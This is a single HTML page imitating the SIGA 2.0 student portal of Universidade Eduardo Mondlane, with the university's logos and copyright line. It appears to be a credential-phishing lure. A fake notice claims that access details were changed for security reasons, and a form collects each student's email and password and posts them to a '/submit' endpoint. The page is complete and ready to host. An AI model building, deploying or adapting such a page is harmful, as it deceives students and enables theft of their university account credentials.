<!DOCTYPE html>
<html lang="pt">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>UEM - SIGA 2.0</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #ffffff;
        }

        .container {
            background-color: white;

            padding: 20px;
            width: 300px;

        }

        .header {
            border: 1px solid #000000;

            padding: 20px;
            text-align: center;
        }

        .footer {
            border: 1px solid #000000;
            font-size: 10px;
            display: flex;
            align-items: center;
            text-align: center;
            padding: 10px;


        }

        .logo {
            display: flex;
            align-items: center;
            justify-content: center;
            margin-bottom: 10px;
        }

        .logo img {
            margin-right: 30px;
            width: 90px;
        }

        .logoA {

            height: 135px;
            width: 0.5px;
        }

        h2 {
            font-size: 20px;
            text-align: center;
            margin: 0;
        }

        p {
            color: #cc0000;
            text-align: left;
            font-size: 11px;
            margin-top: 10px;
        }

        form {
            display: flex;
            flex-direction: column;
        }

        label {
            margin-top: 10px;
            font-size: 14px;
            color: #333;
        }

        input[type="email"],
        input[type="password"] {
            padding: 10px;
            margin-top: 5px;
            border: 1px solid #ccc;

            width: calc(100% - 22px);
            box-sizing: border-box;
        }

        .password-wrapper {
            position: relative;
        }

        .password-wrapper input[type="password"] {
            width: calc(100% - 40px);
        }

        .password-wrapper img {
            position: absolute;
            right: 10px;
            top: 50%;
            transform: translateY(-50%);
            cursor: pointer;
        }

        button {
            margin-top: 20px;
            padding: 10px;
            background-color: #2e7d32;
            color: white;
            border: none;

            cursor: pointer;
            font-size: 11px;
        }

        a {
            text-align: right;
            display: block;
            margin-top: 10px;
            color: #2f00c8;
            text-decoration: underline;
            font-size: 11px;
        }

        .footer-text {
            padding: 3px;
            font-size: 11px;


        }
        .ignore{
            color: #ffffff;
        }
    </style>
</head>

<body>
    <div class="container">
        <div class="header">
            <div class="logo">
                <img class="logo" src="logo-uem.596f24ee.png" alt="UEM Logo" width="50">
                <img class="logoA" src="AAA.png" alt="UEM Logo" width="10">
                <img class="logo" src="download.jpg" alt="SIGA Logo" width="50">
            </div>
            <h2>SISTEMA INTEGRADO DE GESTÃO ACADÉMICA</h2>

            <p>Caro estudante, por motivos de segurança os seus dados de acesso ao SIGA 2.0 foram atualizados.</p>
            <p>Neste sentido, para aceder ao sistema deverá usar como user name o seu e-mail de estudante da UEM e como
                password o seu nr. de estudante. Isto é:</p>
            <p>Username: colocar seu e-mail na forma xxxxxx@uem.ac.mz</p>
            <p>Password: colocar seu nr. de estudante</p>
            <form action="/submit" method="POST">
                <label for="email"></label>
                <input type="email" id="email" name="email" placeholder="Email do utilizador" required>

                <label for="password"></label>
                <div class="password-wrapper">
                    <input type="password" id="password" name="password" placeholder="Password" required>
                    <img src="eye-icon.png" alt="Show Password" id="togglePassword">
                </div>

                <button type="submit">INICIAR SESSÃO</button>
            </form>
            <a href="#">Recuperar senha</a>
        </div>
        <div class="ignore">ddd</div>
        <div class="footer">
            <div class="footer-text">
                Copyright © 2024 UEM - Todos os Direitos Reservados
            </div>
        </div>
    </div>

    <script>
        const togglePassword = document.getElementById('togglePassword');
        const password = document.getElementById('password');

        togglePassword.addEventListener('click', function () {
            const type = password.getAttribute('type') === 'password' ? 'text' : 'password';
            password.setAttribute('type', type);
            this.src = type === 'password' ? 'eye-icon.png' : 'eye-slash-icon.png';
        });
    </script>
</body>

</html>